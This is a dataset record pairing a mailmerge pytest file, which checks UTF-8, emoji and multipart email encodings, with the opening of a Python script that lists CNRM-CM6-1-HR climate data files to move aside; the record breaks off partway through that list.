a47465a78bbb089f3e2f135e7aecaf5e12259e56
|
[
"MIT"
] | 94
|
2016-03-17T18:04:55.000Z
|
2022-03-16T02:59:51.000Z
|
tests/test_template_message_encodings.py
|
thunderbirdtr/mailmerge
|
a47465a78bbb089f3e2f135e7aecaf5e12259e56
|
[
"MIT"
] | 116
|
2016-11-07T16:54:24.000Z
|
2022-01-24T15:14:43.000Z
|
tests/test_template_message_encodings.py
|
thunderbirdtr/mailmerge
|
a47465a78bbb089f3e2f135e7aecaf5e12259e56
|
[
"MIT"
] | 41
|
2016-06-06T16:51:40.000Z
|
2021-12-30T09:57:33.000Z
|
"""
Tests for TemplateMessage with different encodings.
Andrew DeOrio <awdeorio@umich.edu>
"""
import re
import textwrap
from mailmerge import TemplateMessage
def test_utf8_template(tmp_path):
"""Verify UTF8 support in email template."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
SUBJECT: Testing mailmerge
FROM: from@test.com
From the Tagelied of Wolfram von Eschenbach (Middle High German):
Sîne klâwen durh die wolken sint geslagen,
er stîget ûf mit grôzer kraft,
ich sih in grâwen tägelîch als er wil tagen,
den tac, der im geselleschaft
erwenden wil, dem werden man,
den ich mit sorgen în verliez.
ich bringe in hinnen, ob ich kan.
sîn vil manegiu tugent michz leisten hiez.
http://www.columbia.edu/~fdc/utf8/
"""))
template_message = TemplateMessage(template_path)
sender, recipients, message = template_message.render({
"email": "myself@mydomain.com",
})
# Verify encoding
assert message.get_content_maintype() == "text"
assert message.get_content_subtype() == "plain"
assert message.get_content_charset() == "utf-8"
# Verify sender and recipients
assert sender == "from@test.com"
assert recipients == ["to@test.com"]
# Verify content
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == textwrap.dedent("""\
From the Tagelied of Wolfram von Eschenbach (Middle High German):
Sîne klâwen durh die wolken sint geslagen,
er stîget ûf mit grôzer kraft,
ich sih in grâwen tägelîch als er wil tagen,
den tac, der im geselleschaft
erwenden wil, dem werden man,
den ich mit sorgen în verliez.
ich bringe in hinnen, ob ich kan.
sîn vil manegiu tugent michz leisten hiez.
http://www.columbia.edu/~fdc/utf8/""")
def test_utf8_database(tmp_path):
"""Verify UTF8 support when template is rendered with UTF-8 value."""
# Simple template
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Hi {{name}}
"""))
# Render template with context containing unicode characters
template_message = TemplateMessage(template_path)
sender, recipients, message = template_message.render({
"name": "Laȝamon",
})
# Verify sender and recipients
assert sender == "from@test.com"
assert recipients == ["to@test.com"]
# Verify message encoding. The template was ASCII, but when the template
# is rendered with UTF-8 data, the result is UTF-8 encoding.
assert message.get_content_maintype() == "text"
assert message.get_content_subtype() == "plain"
assert message.get_content_charset() == "utf-8"
# Verify content
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hi Laȝamon"
def test_utf8_to(tmp_path):
"""Verify UTF8 support in TO field."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: Laȝamon <to@test.com>
FROM: from@test.com
{{message}}
"""))
template_message = TemplateMessage(template_path)
_, recipients, message = template_message.render({
"message": "hello",
})
# Verify recipient name and email
assert recipients == ["to@test.com"]
assert message["to"] == "Laȝamon <to@test.com>"
def test_utf8_from(tmp_path):
"""Verify UTF8 support in FROM field."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: Laȝamon <from@test.com>
{{message}}
"""))
template_message = TemplateMessage(template_path)
sender, _, message = template_message.render({
"message": "hello",
})
# Verify sender name and email
assert sender == "Laȝamon <from@test.com>"
assert message["from"] == "Laȝamon <from@test.com>"
def test_utf8_subject(tmp_path):
"""Verify UTF8 support in SUBJECT field."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
SUBJECT: Laȝamon
{{message}}
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({
"message": "hello",
})
# Verify subject
assert message["subject"] == "Laȝamon"
def test_emoji(tmp_path):
"""Verify emoji are encoded."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: test@test.com
SUBJECT: Testing mailmerge
FROM: test@test.com
Hi 😀
""")) # grinning face emoji
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
# Verify encoding
assert message.get_charset() == "utf-8"
assert message["Content-Transfer-Encoding"] == "base64"
# Verify content
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hi 😀"
def test_emoji_markdown(tmp_path):
"""Verify emoji are encoded in Markdown formatted messages."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: test@example.com
SUBJECT: Testing mailmerge
FROM: test@example.com
CONTENT-TYPE: text/markdown
```
emoji_string = 😀
```
""")) # grinning face emoji
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
# Message should contain an unrendered Markdown plaintext part and a
# rendered Markdown HTML part
message_payload = message.get_payload()[0]
plaintext_part, html_part = message_payload.get_payload()
# Verify encodings
assert str(plaintext_part.get_charset()) == "utf-8"
assert str(html_part.get_charset()) == "utf-8"
assert plaintext_part["Content-Transfer-Encoding"] == "base64"
assert html_part["Content-Transfer-Encoding"] == "base64"
# Verify content, which is base64 encoded grinning face emoji
plaintext = plaintext_part.get_payload(decode=True).decode("utf-8")
htmltext = html_part.get_payload(decode=True).decode("utf-8")
assert plaintext == '```\nemoji_string = \U0001f600\n```'
assert htmltext == (
"<html><body><p><code>"
"emoji_string = \U0001f600"
"</code></p></body></html>"
)
def test_emoji_database(tmp_path):
"""Verify emoji are encoded when they are substituted via template db.
The template is ASCII encoded, but after rendering the template, an emoji
character will be substituted into it. The result should be a utf-8
encoded message.
"""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: test@test.com
SUBJECT: Testing mailmerge
FROM: test@test.com
Hi {{emoji}}
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({
"emoji": "😀" # grinning face
})
# Verify encoding
assert message.get_charset() == "utf-8"
assert message["Content-Transfer-Encoding"] == "base64"
# Verify content
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hi 😀"
def test_encoding_us_ascii(tmp_path):
"""Render a simple template with us-ascii encoding."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Hello world
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
assert message.get_charset() == "us-ascii"
assert message.get_content_charset() == "us-ascii"
assert message.get_payload() == "Hello world"
def test_encoding_utf8(tmp_path):
"""Render a simple template with UTF-8 encoding."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Hello Laȝamon
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
assert message.get_charset() == "utf-8"
assert message.get_content_charset() == "utf-8"
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hello Laȝamon"
def test_encoding_is8859_1(tmp_path):
"""Render a simple template with IS8859-1 encoding.
Mailmerge will coerce the encoding to UTF-8.
"""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Hello L'Haÿ-les-Roses
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
assert message.get_charset() == "utf-8"
assert message.get_content_charset() == "utf-8"
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hello L'Haÿ-les-Roses"
def test_encoding_mismatch(tmp_path):
"""Render a simple template that lies about its encoding.
Header says us-ascii, but it contains utf-8.
"""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Content-Type: text/plain; charset="us-ascii"
Hello Laȝamon
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
assert message.get_charset() == "utf-8"
assert message.get_content_charset() == "utf-8"
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hello Laȝamon"
def test_encoding_multipart(tmp_path):
"""Render a utf-8 template with multipart encoding."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="boundary"
This is a MIME-encoded message. If you are seeing this, your mail
reader is old.
--boundary
Content-Type: text/plain; charset=utf-8
Hello Laȝamon
--boundary
Content-Type: text/html; charset=utf-8
<html>
<body>
<p>Hello Laȝamon</p>
</body>
</html>
"""))
template_message = TemplateMessage(template_path)
sender, recipients, message = template_message.render({})
# Verify sender and recipients
assert sender == "from@test.com"
assert recipients == ["to@test.com"]
# Should be multipart: plaintext and HTML
assert message.is_multipart()
parts = message.get_payload()
assert len(parts) == 2
plaintext_part, html_part = parts
# Verify plaintext part
assert plaintext_part.get_charset() == "utf-8"
assert plaintext_part.get_content_charset() == "utf-8"
assert plaintext_part.get_content_type() == "text/plain"
plaintext = plaintext_part.get_payload(decode=True).decode("utf-8")
plaintext = plaintext.strip()
assert plaintext == "Hello Laȝamon"
# Verify html part
assert html_part.get_charset() == "utf-8"
assert html_part.get_content_charset() == "utf-8"
assert html_part.get_content_type() == "text/html"
htmltext = html_part.get_payload(decode=True).decode("utf-8")
htmltext = re.sub(r"\s+", "", htmltext) # Strip whitespace
assert htmltext == "<html><body><p>HelloLaȝamon</p></body></html>"
def test_encoding_multipart_mismatch(tmp_path):
"""Render a utf-8 template with multipart encoding and wrong headers.
Content-Type headers say "us-ascii", but the message contains utf-8.
"""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="boundary"
This is a MIME-encoded message. If you are seeing this, your mail
reader is old.
--boundary
Content-Type: text/plain; charset=us-ascii
Hello Laȝamon
--boundary
Content-Type: text/html; charset=us-ascii
<html>
<body>
<p>Hello Laȝamon</p>
</body>
</html>
"""))
template_message = TemplateMessage(template_path)
sender, recipients, message = template_message.render({})
# Verify sender and recipients
assert sender == "from@test.com"
assert recipients == ["to@test.com"]
# Should be multipart: plaintext and HTML
assert message.is_multipart()
parts = message.get_payload()
assert len(parts) == 2
plaintext_part, html_part = parts
# Verify plaintext part
assert plaintext_part.get_charset() == "utf-8"
assert plaintext_part.get_content_charset() == "utf-8"
assert plaintext_part.get_content_type() == "text/plain"
plaintext = plaintext_part.get_payload(decode=True).decode("utf-8")
plaintext = plaintext.strip()
assert plaintext == "Hello Laȝamon"
# Verify html part
assert html_part.get_charset() == "utf-8"
assert html_part.get_content_charset() == "utf-8"
assert html_part.get_content_type() == "text/html"
htmltext = html_part.get_payload(decode=True).decode("utf-8")
htmltext = re.sub(r"\s+", "", htmltext) # Strip whitespace
assert htmltext == "<html><body><p>HelloLaȝamon</p></body></html>"
| 32.261682
| 79
| 0.656938
| 1,702
| 13,808
| 5.179201
| 0.12691
| 0.02042
| 0.026092
| 0.028928
| 0.839932
| 0.809643
| 0.760068
| 0.731821
| 0.718548
| 0.697221
| 0
| 0.00922
| 0.222335
| 13,808
| 427
| 80
| 32.337237
| 0.811231
| 0.146075
| 0
| 0.780488
| 0
| 0
| 0.37123
| 0.024061
| 0
| 0
| 0
| 0
| 0.226481
| 1
| 0.04878
| false
| 0
| 0.010453
| 0
| 0.059233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8b0514fa0cdcb7f0a0b23606b8d09e03564e297d
| 116,622
|
py
|
Python
|
scripts/update_dreqs/update_dreqs_0004.py
|
jonseddon/primavera-dmt
|
1239044e37f070b925a3d06db68351f285df780c
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/update_dreqs/update_dreqs_0004.py
|
jonseddon/primavera-dmt
|
1239044e37f070b925a3d06db68351f285df780c
|
[
"BSD-3-Clause"
] | 49
|
2018-11-14T17:00:03.000Z
|
2021-12-20T11:04:22.000Z
|
scripts/update_dreqs/update_dreqs_0004.py
|
jonseddon/primavera-dmt
|
1239044e37f070b925a3d06db68351f285df780c
|
[
"BSD-3-Clause"
] | 2
|
2018-07-04T10:58:43.000Z
|
2018-09-29T14:55:08.000Z
|
#!/usr/bin/env python2.7
"""
update_dreqs_0004.py
This file moves files that don't have a variable request out of the submission
directory and into a spare directory for CNRM-CERFACS, for the CNRM-CM6-1-HR
model, highresSST-present experiment, v20170518_1970 submission.
"""
import argparse
import logging.config
import os
import shutil
import sys
__version__ = '0.1.0b1'
DEFAULT_LOG_LEVEL = logging.WARNING
DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
logger = logging.getLogger(__name__)
def parse_args():
"""
Parse command-line arguments
"""
parser = argparse.ArgumentParser(description='Fix a data submission')
parser.add_argument('-l', '--log-level', help='set logging level to one of '
'debug, info, warn (the default), or error')
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
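# Illustrative sketch only (an assumed helper, not the script's own code): the
# module docstring describes relocating each "version_dir/filename" entry from the
# submission directory into the spare directory. Given the base_input_dir, dest_dir
# and files_to_move values set up in main() below, that move could be written as:
def _move_out_of_submission(partial_paths, base_input_dir, dest_dir):
    """Move each partial path from base_input_dir into dest_dir, keeping the filename."""
    for partial_path in partial_paths:
        src = os.path.join(base_input_dir, partial_path)
        if not os.path.exists(src):
            logger.warning('%s does not exist, skipping', src)
            continue
        shutil.move(src, os.path.join(dest_dir, os.path.basename(partial_path)))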
def main(args):
"""
Main entry point
This list was constructed at the prompt:
cat ~/lotus/3407487.o | grep 'WARNING: File failed validation. '\
'No variable request found for file' > ~/lotus/no_vr.txt
And then the Python
all_files = list_files('/group_workspaces/jasmin2/primavera4/upload/'
'CNRM-CERFACS/CNRM-CM6-1-HR/incoming/'
'v20170518_1950')
partial_paths = []
with open('no_vr.txt', 'r') as fh:
for line in fh:
fn = line.split(' ')[-1][:-2]
matching = filter(lambda x: fn in x, all_files)
for path in matching:
partial_paths.append('/'.join(path.split('/')[-2:]))
with open('partial_list.txt', 'w') as foh:
foh.write('[\n')
for line in partial_paths:
foh.write("'{}',\n".format(line))
foh.write(']\n')
partial_list.txt was then copied and pasted into the variable
files_to_move below
"""
base_input_dir = ('/group_workspaces/jasmin2/primavera4/upload/'
'CNRM-CERFACS/CNRM-CM6-1-HR/incoming')
dest_dir = ('/group_workspaces/jasmin2/primavera4/upload/'
'CNRM-CERFACS-additional/CNRM-CM6-1-HR/incoming/v20170622_1970')
# If using a modern IDE, the next variable assignment might be worth
# collapsing/hiding as it is longer than ideal.
files_to_move = [
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19721231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19720131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720201-19720229.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720401-19720430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720501-19720531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720601-19720630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720801-19720831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721101-19721130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721201-19721231.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201-197212.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19720131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720201-19720229.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720501-19720531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720601-19720630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720701-19720731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721001-19721031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721201-19721231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19701231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19711231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19720131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720401-19720430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720501-19720531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720701-19720731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720801-19720831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720901-19720930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721001-19721031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721101-19721130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721201-19721231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19720131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720201-19720229.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720301-19720331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720601-19720630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720801-19720831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720901-19720930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721101-19721130.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
